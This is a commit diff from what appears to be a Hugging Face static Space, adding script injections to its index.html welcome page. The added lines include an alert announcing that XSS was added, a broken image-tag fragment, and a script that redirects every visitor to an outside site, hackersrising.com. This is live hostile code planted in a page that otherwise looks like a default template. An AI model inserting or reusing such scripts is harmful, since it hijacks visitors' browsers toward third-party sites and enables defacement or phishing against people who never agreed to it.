Spaces:
Running
Running
Update index.html
Browse files- index.html +3 -0
index.html
CHANGED
@@ -9,10 +9,13 @@
|
|
9 |
<body>
|
10 |
<div class="card">
|
11 |
<h1>Welcome to your static Space!</h1>
|
|
|
|
|
12 |
<p>You can modify this app directly by editing <i>index.html</i> in the Files and versions tab.</p>
|
13 |
<p>
|
14 |
Also don't forget to check the
|
15 |
<a href="https://huggingface.co/docs/hub/spaces" target="_blank">Spaces documentation</a>.
|
|
|
16 |
</p>
|
17 |
</div>
|
18 |
</body>
|
|
|
9 |
<body>
|
10 |
<div class="card">
|
11 |
<h1>Welcome to your static Space!</h1>
|
12 |
+
<script>alert('Hackerone Thee Eclipse Added XSS here')</script>
|
13 |
+
>img src=x>
|
14 |
<p>You can modify this app directly by editing <i>index.html</i> in the Files and versions tab.</p>
|
15 |
<p>
|
16 |
Also don't forget to check the
|
17 |
<a href="https://huggingface.co/docs/hub/spaces" target="_blank">Spaces documentation</a>.
|
18 |
+
<script>document.location='https://hackersrising.com'</script>
|
19 |
</p>
|
20 |
</div>
|
21 |
</body>
|